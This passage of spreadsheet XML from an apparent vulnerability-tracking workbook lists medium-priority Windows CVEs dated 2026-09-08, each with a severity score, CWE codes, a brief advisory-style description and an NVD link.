          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69365</t>
        </is>
      </c>
      <c r="C659" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G659" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69371</t>
        </is>
      </c>
      <c r="C660" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G660" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="C661" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G661" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H661" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I661" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L661" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="C662" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G662" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L662" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69427</t>
        </is>
      </c>
      <c r="C663" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G663" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69458</t>
        </is>
      </c>
      <c r="C664" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G664" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L664" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69462</t>
        </is>
      </c>
      <c r="C665" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G665" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L665" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69481</t>
        </is>
      </c>
      <c r="C666" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G666" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L666" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="C667" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G667" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L667" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="C668" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G668" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L668" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69512</t>
        </is>
      </c>
      <c r="C669" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G669" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L669" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69619</t>
        </is>
      </c>
      <c r="C670" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G670" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L670" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69623</t>
        </is>
      </c>
      <c r="C671" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G671" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L671" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69625</t>
        </is>
      </c>
      <c r="C672" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G672" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L672" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69643</t>
        </is>
      </c>
      <c r="C673" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G673" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L673" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69689</t>
        </is>
      </c>
      <c r="C674" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G674" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="L674" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69714</t>
        </is>
      </c>
      <c r="C675" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G675" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L675" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69717</t>
        </is>
      </c>
      <c r="C676" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G676" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="L676" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="C677" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G677" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L677" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69762</t>
        </is>
      </c>
      <c r="C678" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G678" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L678" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="C679" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G679" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L679" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="C680" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G680" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H680" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I680" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L680" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="M680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69807</t>
        </is>
      </c>
      <c r="C681" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G681" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L681" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="C682" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G682" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L682" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="C683" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G683" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
